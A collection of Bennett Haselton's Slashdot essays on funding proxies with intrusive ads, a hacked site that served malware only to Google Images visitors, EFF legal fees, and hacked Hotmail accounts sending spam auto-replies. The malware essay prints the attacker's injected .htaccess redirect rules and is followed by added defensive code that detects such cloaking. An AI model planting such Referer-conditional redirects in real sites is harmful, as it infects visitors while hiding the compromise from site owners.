I propose that ads which are even more intrusive than pop-ups -- thus grabbing more of the user's attention and providing more value to the advertiser, thus enabling them to pay more to sites which run the ads -- would enable proxy site operators to fund more of the costs of their operation, and hence would be a Good Thing. The existence of such intrusive ads does not mean that they would suddenly be plastered all over every proxy site. If your user base can be served for a lower cost, then you don't have to "charge" as much (in terms of advertisement intrusiveness) to use your proxy service. Over 90% of the traffic to my proxy sites is to domains that have already been blocked a long time ago by Websense, Smartfilter, Lightspeed, and most of the rest of the censorware companies. Apparently there are a lot of users who are on censored networks and who need proxies, but whose network admins just haven't updated the blacklists in a very long time, or who haven't paid the subscription fee to keep downloading database updates. Since you don't need to register 10 new domain names every day to serve that audience, there would continue to be proxies for those users with less-intrusive ads on them. But the more-intrusive (and higher-paying) ads would also enable proxy webmasters to serve a "higher-end" audience, the ones who need several new sites every day, to stay ahead of the more frequently-updated filters.
I can think of several ways that more intrusive ads might work. My favorite would be a "quiz" model wherein a drop-down advertisement appears in front of the site you're trying to access, consisting of some promotional content, and a little form at the bottom. In order to make the drop-down ad disappear, you have to read the ad and fill in the answers to some one-word questions or multiple-choice questions about the content, to prove you actually read it.
Perhaps I'm biased in favor of this idea because I'm tired of ads that contain splashy graphics and expensively licensed music and never contain any actual information. The only television ad that I can recall viewing in the past year which prompted me to actually buy the advertiser's product, was the Pizza Hut ad announcing that you could get a large pizza with any number of toppings for $10. That's what I want in an ad. I give you $10. You give me a pizza. (And this extra plug for their $10 pizza promotion, can be considered a thank-you to them for running an ad that actually had something to say.) Most ads on TV are far less informative, serving mostly to give a glossy sheen to the advertiser's brand name. Yet these ads are paid for by corporations who do the market research and the focus grouping, so the ads must work. Many economists, including Tim Harford in The Undercover Economist and Steven Landsburg in The Armchair Economist, have explained why companies pay for ads that do nothing except look expensive: Because they prove to the viewer that the company intends to be around for a long time, in order to capitalize on the long-term exposure given to them by the ad. This has become so standard that making an ad which actually gives the user information seems tawdry by comparison. The most ghetto-sounding word in TV advertising is "infomercial".
But I think that some companies could benefit from greater exposure of actual information about their product, just as there are companies that pay for infomercials. And if a company like Linksys really wanted to run a splashy ad that contained no actual information, and then make me answer some questions at the bottom like:
Linksys is:
(a) the leading manufacturer of wireless adapter cards
(b) the leading manufacturer of wireless routers
(c) the leading manufacturer of wireless monitoring cameras
(d) all of the above!!!
then that's their prerogative. The quiz-advertisement model only says that advertisers can require users to answer a question before closing the ad; it would be up to the advertiser to decide what question works best. I suspect that the actual-information model would work better for quiz ads, but advertisers could try both and see what works.
There are already some websites that require you to "complete an offer" (i.e. become a customer of some third-party company, at least for a free trial period) in order to use their services, but most proxy sites have so far declined to carry advertisements like these. Evidently their users consider this too high of a price to pay to access a proxy site. Filling out an offer is not just time-consuming, but leaves the door open to future problems -- will they sell your name or your e-mail address? Will they make it hard to cancel your "free trial", and then start billing you? The problem seems to be that there is too large of a gap between the "fees" associated with the two options -- a normal advertisement doesn't bring enough money to the proxy operator, but a complete-an-offer advertisement is such a steep price that most users won't pay it. The "quiz ad" is like a "fee" that falls nicely in the middle -- a smaller time commitment, and your worries are over after you fill in the quiz and hit submit.
If the very thought of such an ad still seems too annoying for words, then I think that objection misses the point. If the revenue from "normal" ads (pop-ups, drop-downs, AdSense widgets) is enough to pay for the operation of a "high-end" proxy service (catering to the people who need several new proxies every day), then such proxy services with "normal" ads will continue to exist. Indeed, anyone who tried running the more annoying "quiz ads" would not be able to get off the ground, because users would flock to the competing proxy sites using normal ads instead. If "high-end" proxy services flourished that were using quiz ads, it would only be because you simply can't provide a high-end service for less money than the quiz ads are bringing in.
It's possible that some advertisers would be reluctant to display ads in a manner that users would consider an annoying obstacle, but I'm not sure that's really a problem. The most intrusive advertisements currently in use on mainstream websites are probably the "premercials" that display before some news videos on CNN.com and other news sites. Unlike drop-down ads which can be closed with the click of a button, the video pre-mercials can't be skipped. Since you're actually expecting the news video to come up immediately when you click the link to start playing the video, you would think that many users would grit their teeth in annoyance upon seeing the "pre-mercial", and transfer that irritation to the advertiser's brand name, but there are so many big-name companies buying those pre-mercials that they must believe it's having a positive effect. So intrusiveness itself doesn't seem to tarnish a brand.
But I don't propose to micro-manage suggestions for how the more intrusive ads would look, or how advertisers should tailor their ads to fit the format. I'm just saying that a new breed of more intrusive ads, even more annoying than pop-ups, might be just what we need to stay ahead of increasingly sophisticated Internet censors. It's still technically quite trivial to release a steady stream of new proxy sites that defeat most Internet filters, but it costs money to buy domains and maintain the service, and the money has to come from somewhere.
-
Image Searchers Snared By Malware
Slashdot frequent contributor Bennett Haselton writes "Sites that have been hacked by malware writers are now serving infected content only when the visitor views the site through a frame on Google Images. This recent twist on a standard trick used by malware writers, makes it harder for webmasters and hosting companies to discover that their sites have been infected. Automated tools that check websites for infections and training procedures for hosting company abuse-department staffers will have to be updated accordingly." Read on for the rest of Bennett's thoughts.
A friend of mine recently e-mailed a discussion list with an interesting query. Stonewall Ballard had searched on "tradingbloxlogo" on Google Images, which led to the results on this page. Clicking on the first result, an image from the tradingblox.com site, took him to this page, with the Google information header at the top, and loading the http://www.tradingblox.com/tradingblox/courses.htm page in a frame in the bottom half of the browser window. When that page was loaded in that bottom frame, Internet Explorer and Firefox would both flash warnings about the page being infected with malware. But if you loaded the http://www.tradingblox.com/tradingblox/courses.htm page in a normal Web browser window by itself, the browser would not display any warning, and checking the site using Google's malware query form returned a result saying the site was not suspicious. Why the differing results?
It turned out that the tradingblox.com site had been hacked, and pages had been installed onto the server that would serve malware in an unusual way: If the page was being viewed in a frame loaded from Google Images, or as a result of a click through from Google Images, then the page would serve content that attempted to infect the user's computer with malware. On the other hand, if the page was viewed normally (as a result of typing the page into your browser), the malware-loading code would not be served. That means if you were to telnet to port 80 on the www.tradingblox.com server, and request a page as follows:
GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com
then the normal page would be returned. But if you entered these commands:
GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com
Referer: http://images.google.com/
then you would get the malware-infected page. (The webmaster has since fixed the problem, so that the latter request will no longer get the malware code.) The webserver would only serve the infected content if "images.google.com" was sent specifically as the referrer; "www.google.com" by itself would not trigger the result.
(For the uninitiated, when you click a link from one page to another, for example if you were reading an article on CNN.com which had a link to http://www.google.com/support/ and you clicked on that link, then when your browser requested the file "/support/" from the www.google.com server, it would send the request as follows:
GET /support/ HTTP/1.1
Host: www.google.com
Referer: http://www.cnn.com/article.url.goes.here/
So the webmasters of www.google.com can see what links people are clicking from other websites to reach the www.google.com site. Many sites use this to track which links from other pages, including advertisements that they've bought on other sites, are sending them the most traffic.)
Denis Sinegubko, owner of the website malware-infection checking site UnmaskParasites.com, says that he had seen pages before which would serve infected content if www.google.com itself were listed in the Referer: field. However, this was the first instance he'd seen where the content was only served if images.google.com was specifically listed as the Referer. Since no malware distributor would manually break into just one website to compromise it in this exact manner, it's extremely likely that there are many more sites that are infected in the same way. Stonewall Ballard noted that the Google Safe Browsing lookup for the hosting company where tradingblox.com is hosted, showed a high number of other sites on the same network that had been infected recently. (And those are only the infected sites that Google knows about -- recall that Google didn't even know that tradingblox.com was infected.)
Obviously, from the malware author's point of view, the point of serving malware content only some of the time rather than all of the time, is to make it harder for webmasters to pinpoint the problem. Someone gets the malware warning after following a link or loading a page via Google Images, and sends the webmaster an e-mail saying, "I got infected by your webpage, here is the link." The webmaster views the link and says, "I don't know what you're talking about, there's no malware code on that page." It also makes it harder for automated site-checking tools to detect the infection. Google's Safe Browsing lookup tool reported the site as uninfected, and Sinegubko's site-checking tool on UnmaskParasites.com also reported no malware infections on tradingblox.com, even while the site was still infected. (Sinegubko said he would possibly modify his site-checking script so that in addition to the other checks it performs, it will attempt to request a page sending "http://images.google.com/" in the "Referer:" field, to see if that results in different content being served. Google's Safe Browsing spider should do the same.)
Sinegubko said he's also seen instances where hacked sites would cover their tracks even further, by refusing to display infected content if the Referer: link from Google contained "inurl:domainname.com" or "site:domainname.com". This is because webmasters would sometimes check if their site was serving infected content in response to a click from Google, by doing a Google search on their own domainname.com, and following the link back to their site. By not serving the infected content in that case, the malware infection becomes even harder to detect.
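The check Sinegubko describes adding to his site checker, written out as an added example (not code from the article or from UnmaskParasites.com): request the same page with no Referer and with each referrer named in the article, without following redirects, and report the ones that get a different response. The Yahoo referrer comes from the .htaccess lines quoted further down; the function names, the User-Agent string and the local stand-in server (a constructed fixture that redirects to a placeholder host) are assumptions.

```python
import hashlib
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

# Referrers named in the article and in the .htaccess it quotes.
REFERERS = [
    "http://www.google.com/",
    "http://images.google.com/",
    "http://images.search.yahoo.com/",
]


def fetch(url, referer=None, timeout=10):
    """GET url once, without following redirects, and summarise the response."""
    parts = urlsplit(url)
    conn_cls = (http.client.HTTPSConnection if parts.scheme == "https"
                else http.client.HTTPConnection)
    conn = conn_cls(parts.hostname, parts.port, timeout=timeout)
    headers = {"User-Agent": "referer-cloaking-check/0.1"}  # assumed name
    if referer is not None:
        headers["Referer"] = referer
    path = (parts.path or "/") + ("?" + parts.query if parts.query else "")
    try:
        conn.request("GET", path, headers=headers)
        resp = conn.getresponse()
        body = resp.read()
        return {"status": resp.status,
                "location": resp.getheader("Location"),
                "sha256": hashlib.sha256(body).hexdigest()}
    finally:
        conn.close()


def find_referer_cloaking(url, referers=REFERERS):
    """Return (baseline, [(referer, response), ...]) for responses that differ."""
    first, second = fetch(url), fetch(url)
    # Dynamic pages change on every load; if two plain requests already
    # differ in body, compare only status and redirect target.
    keys = (("status", "location", "sha256") if first == second
            else ("status", "location"))
    base = {k: first[k] for k in keys}
    findings = []
    for referer in referers:
        got = fetch(url, referer)
        if {k: got[k] for k in keys} != base:
            findings.append((referer, got))
    return first, findings


class _CloakedSite(BaseHTTPRequestHandler):
    """Constructed stand-in for the behaviour the article describes."""

    def do_GET(self):
        referer = self.headers.get("Referer", "").lower()
        if "images.google" in referer or "images.search.yahoo" in referer:
            self.send_response(302)
            self.send_header("Location", "http://redirect.invalid/")
            self.send_header("Content-Length", "0")
            self.end_headers()
        else:
            body = b"<html><body>courses</body></html>"
            self.send_response(200)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_demo_site():
    """Start the stand-in on a free loopback port; return (server, url)."""
    server = HTTPServer(("127.0.0.1", 0), _CloakedSite)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://127.0.0.1:%d/tradingblox/courses.htm" % server.server_port


if __name__ == "__main__":
    server, url = start_demo_site()
    baseline, findings = find_referer_cloaking(url)
    print("baseline:", baseline["status"])
    for referer, got in findings:
        print("differs for Referer %s -> %s %s"
              % (referer, got["status"], got["location"]))
    server.shutdown()
```

The referrers are deliberately plain: as the paragraph above notes, some infections stay quiet when the referring Google URL contains site: or inurl: for the domain being checked.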
This also makes it harder to report the exploits to the hosting companies that host infected websites. In case the webmaster of the infected site doesn't respond to complaints that their site is infected, sometimes you have to contact the hosting company and ask them to forcibly take the website offline until the problem is fixed. And I have been hosted by several companies where the tech support and abuse departments were (just barely) competent enough that if I called them up and said, "Your customer is hosting a malware-infected webpage, go to this page and view the source code, and you can see the malicious code", they would have known what to do. But if I'd had to tell them to follow the steps above -- "telnet to port 80" on the infected website, and type a few lines to mimic the process of a browser sending HTTP request headers to the website -- I probably would have lost them at "telnet". (Recall an experiment wherein I e-mailed some hosting companies from a Hotmail account, asking them to change the nameservers for a domain that I had hosted with them, and about half of the hosting companies agreed to switch the domain nameservers -- essentially, transferring the entire website to an unknown third party -- without ever authenticating that it was really me writing from that Hotmail account. Which means anybody could have taken over those websites simply by sending an e-mail. Front-end tech support at cheap hosting companies is often not very smart.)
Fortunately, Tim Arnold, the webmaster of the tradingblox.com site, did respond to the original report about the malware-infected pages, and found that an intruder had hacked the site on November 30th and inserted these lines into an .htaccess file:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://search-box.in/in.cgi?4&parameter=u [R,L]
<Files 403.shtml>
order allow,deny
allow from all
</Files>
which resulted in the infected pages being served whenever a user loaded the site via Google Images. (So if you found this article because you think your own site might be infected by malware that serves pages conditionally on the Referer: field, that's the first place to look to fix the problem!)
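For the "first place to look", an added example (not from the article) that audits .htaccess text for the pattern in the lines quoted above: a RewriteCond on %{HTTP_REFERER} that guards a RewriteRule redirecting to another host. The sample input is constructed, modelled on those lines with a placeholder target, and the function names and the own_hosts parameter are assumptions.

```python
import os
from urllib.parse import urlsplit

# Constructed sample: the first rule set mirrors the injected lines
# (placeholder target host); the other two are common benign rules.
SAMPLE = r"""# constructed sample .htaccess
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://redirect.invalid/in.cgi [R,L]
# Hotlink protection: Referer-conditional, but no off-site redirect.
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^https?://(www\.)?example\.com/ [NC]
RewriteRule \.(jpe?g|png)$ - [F]
# Canonical-host redirect: a redirect, but not Referer-conditional.
RewriteCond %{HTTP_HOST} !^www\.example\.com$ [NC]
RewriteRule ^(.*)$ http://www.example.com/$1 [R=301,L]
"""


def _external_host(substitution, own_hosts):
    """Return the target host if the substitution is an off-site URL, else None."""
    try:
        target = urlsplit(substitution)
    except ValueError:
        return None
    host = (target.hostname or "").lower()
    if target.scheme not in ("http", "https") or not host:
        return None
    if "%{" in host or host in own_hosts:  # server variable or our own site
        return None
    return host


def audit_htaccess(text, own_hosts=()):
    """Flag RewriteRules that send visitors off-site based on the Referer."""
    own = {h.lower() for h in own_hosts}
    findings, conds = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        tokens = raw.strip().split()
        if not tokens or tokens[0].startswith("#"):
            continue
        directive = tokens[0].lower()
        if directive == "rewritecond" and len(tokens) >= 3:
            conds.append((tokens[1], tokens[2]))
        elif directive == "rewriterule":
            # RewriteCond lines apply only to the RewriteRule that follows.
            patterns = [p for test, p in conds if "HTTP_REFERER" in test.upper()]
            host = _external_host(tokens[2], own) if len(tokens) >= 3 else None
            if patterns and host:
                findings.append({"line": lineno,
                                 "referer_patterns": patterns,
                                 "target": tokens[2]})
            conds = []
    return findings


def scan_tree(root, own_hosts=()):
    """Audit every .htaccess file under root; return {path: findings}."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = audit_htaccess(fh.read(), own_hosts)
            if found:
                results[path] = found
    return results


if __name__ == "__main__":
    for finding in audit_htaccess(SAMPLE, own_hosts={"www.example.com"}):
        print("line %(line)d: Referer %(referer_patterns)s -> %(target)s" % finding)
```

A hit is a lead to review, not a verdict: compare the file against a known-good copy and check its modification time against the suspected date of the break-in.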
It's uncertain how Arnold's site got infected in the first place, but Sinegubko had earlier said that almost 90% of breakins in 2009 that occurred on Linux-hosted sites, were caused by malware installed surreptitiously on people's Windows PCs and stealing the passwords that people used to administer their sites. Or the site could have been compromised via a WordPress exploit such as this one. As I always tell anyone who will listen, if you want to keep your Linux-hosted website from being broken into, one of the most frequently overlooked precautions that you need to take is to keep your Windows PC free of spyware.
But the larger point is that as malware becomes more aggressive, it's not just going to become harder to keep your PC and websites uninfected. It's also going to become harder for site owners and for hosting company abuse departments to verify that a site has been hacked, as the hacks use more sophisticated techniques to prevent the infection from being discovered. Abuse report handlers will have to be trained to understand what it means that a website is only showing infected content as a result of a "Referer:" header, and ideally should know enough about networking and command-line tools, to be able to mimic the "telnet" instructions above. (Most expensive dedicated hosting companies like RackSpace, do have technical staff who are at least that knowledgeable. But cheap shared hosting companies -- the kind where you can get your domain transferred to another company by sending an e-mail from an unauthenticated Hotmail account -- will have to train their abuse staff better.) Automated site-checking tools like Google's Safe Browsing spider and UnmaskParasites.com's site checker will have to start taking these attacks into account when checking a site for infection.
And as always, keeping your PC free of spyware, shouldn't be viewed just as a convenience to yourself, but as an obligation to your neighbors as well. (A case of the positive/negative externalities problem in economics.) You wouldn't send your kid to school with the flu, so why did you get your Mom on the Internet without buying her some anti-virus software?
-
Universal, Pay Those EFFing Lawyers
Slashdot frequent contributor Bennett Haselton writes "The EFF is seeking over $400,000 in attorney's fees from Universal Music Group after Universal sent a DMCA takedown notice to YouTube, demanding the removal of a video posted by user Stephanie Lenz. Lenz had posted a video of her toddler dancing to a 30-second clip of the Prince song "Let's Go Crazy"; after Universal sent the takedown notice, the EFF sent YouTube a counter-notice on behalf of Lenz arguing that the video was fair use, and YouTube restored it. Now the EFF is asking the judge to award them attorney's fees for their work." Use your magical clicking device below to read many more words.
Section 512(f) of the DMCA says pretty clearly that anyone who "knowingly materially misrepresents under this section... that material or activity is infringing... shall be liable for any damages, including costs and attorneys' fees", which would seem to apply here; the EFF argues that Universal should have reasonably known that the video obviously constituted fair use. In a Law.com article about the case, attorney Kelly Klaus, representing Universal, countered that "Congress also said that there was another remedy, which is the counter-notice procedure, which is what happened here." But this seems to miss the point -- the DMCA says that the remedies are the counter-notice procedure and an award for attorney's fees. (Klaus's firm did not respond to requests for comment for this article.) Anyway, as EFF staff attorney Corynne McSherry points out, if there were no possible award for attorney's fees against copyright holders who make false accusations, then there would be no disincentive for copyright holders to file frivolous accusations in the first place.
I'm an EFF member and support their request for attorney's fees, but let's play devil's advocate. Suppose you were an indie musician who sold your songs online, and you found a number of YouTube videos that used your song without permission, so you sent a long list of DMCA takedown notices to YouTube. Included in that list was one video that used only a brief portion of your song, short enough to count as fair use. Is $400,000 a fair punishment for accidentally including one video in your list that wasn't a bona fide copyright infringement?
On the other hand, if the EFF doesn't get their attorney's fees, then they have to eat the cost of the work they did, and that doesn't seem fair either.
The problem is that once you have a $400,000 bill on the table, someone has to pay it, which punishes one or both parties usually vastly out of proportion to any wrongdoing. ($400,000 is almost half of what Reebok had to pay when one of their lead-tainted bracelets killed a child.) Huge attorney's fees awards also limit access to the court system for plaintiffs who might have a reasonable case, but can't afford the risk of having to pay attorney's fees if they lose, and for defendants who might also have a reasonable case, but are under pressure to settle quickly to avoid the risk of a huge attorney's fees award against them.
This suggests an economics / game theory problem: Could you come up with a system that takes into account the incentives of parties on both sides, and that prevents huge legal bills from being generated?
Now, any argument about the legal system usually raises two kinds of objections. The first is that the existing system "works". Well, in many ways it does, but everybody also knows that wealthy corporations and individuals enjoy a huge advantage in the court system, even though courts are supposed to treat all parties equally. So at least in that respect it doesn't "work" the way it's supposed to. The second objection is that it's too hard to change the rules and traditions that are built into legal proceedings, so it's better just to work within the system. True, but that's not the question I'm asking. I'm posing it as a logical brainteaser: If you had carte blanche to modify the way that legal disputes were held, could you do it in a way that respects the rights and interests of all parties and still minimizes the legal fees incurred? (Whether I'm right or wrong, my goal is to make this argument more interesting to mathematicians and game theorists than to lawyers; otherwise, I've failed.)
From a game-theoretic point of view, you might argue that large attorney's fees serve a useful purpose by discouraging frivolous lawsuits. The problem is that the fees don't just discourage frivolous lawsuits but also non-frivolous lawsuits where there's a reasonable chance of losing. On the other hand, a person who is already broke would have little disincentive to file a frivolous lawsuit, since the worst that can happen is that they'd get hit with a huge award for attorney's fees and have to declare bankruptcy, which they might consider worth the risk for a small shot at a million-dollar payout. So assume that attorney's fees are not themselves the best way to deter frivolous lawsuits, and that avoiding large fees in general is still a desirable thing. How do you design rules to achieve that?
I think you could save a lot of money by enforcing a rule that a lawyer is not allowed to seek attorney's fees from the other side for arguing any points that the other side offered to concede anyway. So the incentive would be that if party A's lawyer concedes some point of fact or point of law, and party B ultimately wins the case and an award for attorney's fees, then party B is not allowed to seek attorney's fees for arguing the point conceded by party A's lawyer.
In all of my legal cases where the other side was represented by a lawyer who was getting paid by their client up front, it was clear from reading the other side's briefs (and my own lawyers agreed with me) that opposing counsel had spent a lot of time spinning their wheels and arguing obvious or irrelevant points before getting to the crux of the dispute. If their client wants to pay them for that busy-work, that's between them and their client, but if they had won the case and an award for attorney's fees, I would have objected that they shouldn't be allowed to charge us for time they spent arguing points that we would have given to them anyway. The hypothetical savings from implementing and enforcing this rule are not trivial.
So how does game theory predict that the two sides would behave under this rule? Suppose MegaCorp is suing or being sued by IndieActivist. MegaCorp's first priority is to win, and if possible to hit IndieActivist with a huge award for attorney's fees to discourage other would-be IndieActivists. MegaCorp doesn't want to lose, but if they do lose, they don't much care about the attorney's fees award they would have to pay to IndieActivist's lawyers. In this scenario, they would be expected to concede very little, disputing trivial points in order to drag out the case as long as possible, hoping that IndieActivist's lawyers would run out of time or money and pressure their client to settle. In other words, MegaCorp would behave about the same as they would under the existing rules.
For IndieActivist, on the other hand, their first priority is to win, but they also care very much about not having to pay a staggering award for attorney's fees if they lose. So they would be expected to concede any points of fact or law, even if favorable to MegaCorp, if those points are so obvious that they don't think the judge would be likely to rule in their favor on those questions anyway. This way, even if IndieActivist loses and has to pay attorney's fees to MegaCorp, those fees would be limited to the time spent arguing the actual point of disagreement that formed the crux of the lawsuit.
Suppose, for example, that Universal had actually sued Lenz for violating Prince's copyright by using a 30-second excerpt of his song in her video. Lenz or her lawyers could have filed a brief conceding all the obvious points that they would expect Universal's lawyers to make: Prince was the holder of the copyright, the copyright had been filed with the Copyright Office, Lenz never sought permission for using the recording, etc. Very quickly, the whole case could be distilled down to: "Show this video to the judge and let them decide if it qualifies as 'fair use'." Any effort spent arguing any points beside that is wasteful. And if the legal system encourages lawyers to rack up billable hours arguing other points, then the system is wasteful. Concede the obvious, and everybody's costs are kept under control.
This only partially addresses the problem of large attorney's fees, because it still leaves the fees that are generated in the process of arguing points that the other side wouldn't concede. Solving this problem is much harder, because while you can simply eliminate the work that's spent on arguing points that the other side would give to you anyway, you can't eliminate the work spent on points that are genuinely in dispute; you can only try to make that work shorter and cheaper. I've argued for my own fairly complicated remedy in a separate article, but my main point was that legal costs aren't driven up so much by the complexity of the law as by the ambiguity in it. The Windows programming interface, after all, is also very complex, but if you can write a clear description of what you want a simple program to do, you can often get a programmer to write the program for you for dirt cheap. In arguing a legal case, on the other hand, the number of possible outcomes grows exponentially with each point of ambiguity in the law where there's no way to predict how the judge will interpret a particular rule.
But still, even if you can't reduce the ambiguity in how a legal question will be interpreted, you can avoid a lot of unnecessary attorney's fees by distilling the case just down to that particular question. Is it fair use to use a 30-second clip of Prince's song in a video of a dancing toddler? Let the judge decide. But if that's the one and only point that both sides can't agree on, then neither side should be able to bill for time spent arguing about anything else.
Perhaps someone mathematically or logically inclined can come up with a better algorithm for avoiding the billing hours generated by arguing the obvious. I'm not entirely happy with my own solution, because it still allows MegaCorp to concede absolutely nothing, and to try and bleed IndieActivist dry by forcing them to argue even the most trivial points. IndieActivist's lawyer could be reimbursed for that time if they win and get an award for attorney's fees, but they might run out of money or patience before then. To counter this tactic, you could allow either side to seek penalties for Frivolously Arguing The Super-Obvious. If IndieActivist's lawyer wants MegaCorp to concede an obvious point and MegaCorp won't do it, IndieActivist could seek a FATSO penalty, and the judge could decide whether to award them that penalty if the point is really and truly obvious, without deciding on the merits of the case as a whole. The penalty doesn't have to be large enough to hurt MegaCorp, it just has to be large enough to compensate IndieActivist's lawyer for their time, so that MegaCorp can't run them into the ground by forcing them to argue every point unnecessarily. However, economic game theorists might think of some unintended consequence of the FATSO rule. Could MegaCorp flood IndieActivist's lawyer with a gigantic list of requested concessions, so that if IndieActivist's lawyer screws up and forgets to concede one of the points that the judge turns out to consider "obvious", MegaCorp could hammer them with a FATSO award too? It's hard to anticipate all the ways that either party might abuse a new rule of the game.
Meanwhile, under the existing system, while it may be unfair to Universal in some cosmic sense that they have to pay out $400,000 for sending one mistaken DMCA takedown notice, it would be more unfair to force the EFF to eat those costs, and in any case the DMCA does clearly allow for an award of attorney's fees. But it would be better for everyone in the long run -- especially for the EFF and the kind of relatively powerless clients that they usually represent -- if there were more ways to keep legal costs from spiraling out of control in the first place.
-
Hotmailers Hawking Hoax Hunan Half-Offs
Frequent Slashdot contributor Bennett Haselton writes "An estimated 200,000 Hotmail users currently have their auto-reply set to a message spamming an advertisement for Chinese scam websites, which sell "discounted" electronics. Presumably the spammers compromised a large number of Hotmail accounts to pull this off, but wouldn't it be pretty easy for Hotmail to query for which users have that set as their auto-reply, and turn the auto-reply off for them?" Read below for Bennett's thoughts.
After a recent mailing that I sent out to a subset of my proxy mailing list, I got back 18 auto-replies from Hotmail users, all substantially similar to this:
Dear friend:
We are an electronic products wholesale .Our products are of high quality and low price. If you want to do business , we can offer you the most reasonable discount to make you get more profits. We are expecting for your business.
Please visit our website: www.wedosale.com
Email: wedosale@vip.188.com .
MSN: wedosale@hotmail.com .
Looking forward to your contact and long cooperation with us!
Our mainly products such the phones, PSP, display TV, notebook, video, computers, Mp4, GPS, xbox 360, digital cameras and so on.
Welcome to visit our website!
Some of the spam auto-replies advertised different websites, and the wording varied between the different auto-responses, but they were all similar advertisements for Chinese electronics "retailers." (And so, I assume, the websites are all fronts for the same company -- if multiple spammers had independently hacked Hotmail users' accounts to set their auto-replies, it would be vanishingly unlikely that those spammers would all happen to be electronics hawkers.) This was from a mailing that I sent to a set of subscribers that included about 26,000 users with "hotmail.com" e-mail addresses. If 18 out of 26,000 users in my sample have had their accounts hacked to send spam auto-replies, then this must be happening to a large number of Hotmail users -- not a large proportion (only one in 1,500, in my sample), but with about 300 million Hotmail users, that would still be a large absolute number.
The same spammers have apparently been spamming through Hotmail auto-replies for at least 11 months, according to this post in the Windows Live Help community forum from January 2009. At first, some pundits seemed to have assumed that spammers had created these accounts themselves and subscribed the accounts to people's lists, in order to spam the list owners (and, if it's a list that accepts subscriber posts, broadcast the spam to the other list readers). However, looking at the addresses in my proxy mailing list that were sending the spam auto-replies, I noticed that (1) our records show that the auto-reply-spamming subscribers joined the mailing list by various means, signing up through different Circumventor websites, not indicative of how a spammer would have joined the list by automated means, and (2) many of their email addresses are associated with legitimate-looking Myspace and Facebook accounts. Thus it looks as if these were real users who joined the list legitimately, and then got their accounts hacked by the spammers, who set those users' accounts to send the spam as an auto-response.
(If you happened to look at the spammers' www.wedosale.com website, at this point you might be thinking: I don't want to give money to spammers, but can I really get a Blackberry for only $295? Couldn't I just order from the website, and then if the goods don't show up or they're not as advertised, I can dispute the charge on my credit card? Well, I signed up for a dummy account on the www.wedosale.com page and got as far as the order page, and the only payment types that they accept are wire transfer, Western Union, and Moneygram -- precisely those types where you cannot get the money back or dispute fraudulent charges. If you've already gone and ordered a Blackberry, don't hold your breath.)
If my 26,000 users were a representative sample of the 300 million current Hotmail users, then with 1 out of 1,500 users in my sample being "infected," I could estimate that about 200,000 Hotmail users (1/1500 times 300 million) are currently set to send spam auto-replies. Hotmail claims to process 3 billion non-spam e-mails per day, for an average of about 10 non-spam e-mails per Hotmail user. That's the average for all users; what's the average for the infected users? Some factors would tend to lead to a lower average for infected users -- if they have lots of friends sending them mail, it's more likely that one of their friends would have told them about the auto-reply spam and told them to turn it off, so perhaps the users still sending the spams are the ones who don't receive a lot of messages from their friends. On the other hand, some of the infected accounts may be receiving more (non-spam) e-mail than average; one reason people sometimes abandon webmail accounts is that they're getting too much mail, even from newsletters like the Circumventor list that they had legitimately subscribed to. So, figuring that factors in both directions roughly cancel out, if each infected user is receiving the average number of 10 emails per day and sending 10 auto-reply spams in response, that's still a total of 2 million outgoing spams per day shilling for nonexistent Chinese iPhones.
These are just back-of-the-envelope calculations, but even if I'm overestimating by a whole order of magnitude, that's still 0.2 million auto-reply spams per day, or about 70 million spams that will be sent by this one company through Hotmail's servers in the coming year, if Hotmail doesn't stop it. (And closer to a billion spams in the coming year if I'm not overestimating.)
And it's actually worse than that, because these spams are less likely than average to be filtered, since they're coming from Hotmail's servers. Normally you'd think that the content-based module of a spam filter would have no problem catching a message like the one at the top of this article, especially if millions of similar messages have been spewed out over the past year. However, messages from Hotmail's servers, regardless of content, are less likely to be blocked, since their network has a good reputation for sending little spam overall (due to measures such as requiring users to fill out a CAPTCHA when signing up, blocking each account from sending more than 500 messages per day, etc.). When I sent messages to the infected Hotmail users from my Gmail account, to see if the auto-responses would get through Gmail's spam filter, Gmail blocked only half of the replies. When I mailed all the users again from my Hotmail account, the results were strange -- most of the users' accounts sent back no auto-reply at all, not even a reply that got routed to my junk folder. (Why would Hotmail accounts not send an auto-reply in response to a message from a Hotmail user? Please post if you have any idea what's going on there.) However, of the infected Hotmail accounts that did send a spam auto-reply, 100% of those auto-reply spams were delivered to my inbox. (Apparently, Hotmail's spam filter usually assumes that messages from other Hotmail users can't possibly be spam.) Only Yahoo Mail's spam filter, when I sent a test message to the infected users from my Yahoo Mail account, blocked all of the auto-replies as junk mail.
For the infected users on my mailing list, I sent them a link to a set of instructions I'd written about how to set and un-set their Hotmail auto-reply and how to change their Hotmail password, with the hopes that they'd eventually see the message and follow the steps. 18 users rescued, 200,000 to go.
So this is basically what's happening, but it still leaves some unanswered questions, such as: Why Hotmail accounts, but not Yahoo Mail, Gmail, or AOL accounts? I've never noticed any auto-reply spam sent from any accounts at any of those other services. Whatever the spammers did to gain control of so many Hotmail accounts, if it was profitable for them, why didn't they do the same thing for Yahoo Mail? And, why did only one spammer do this? If they're sending between 1 and 10 million spams per day for free, they're probably making money at it. Whatever they did to hack those accounts, why wouldn't other spammers figure out the same method and copy them?
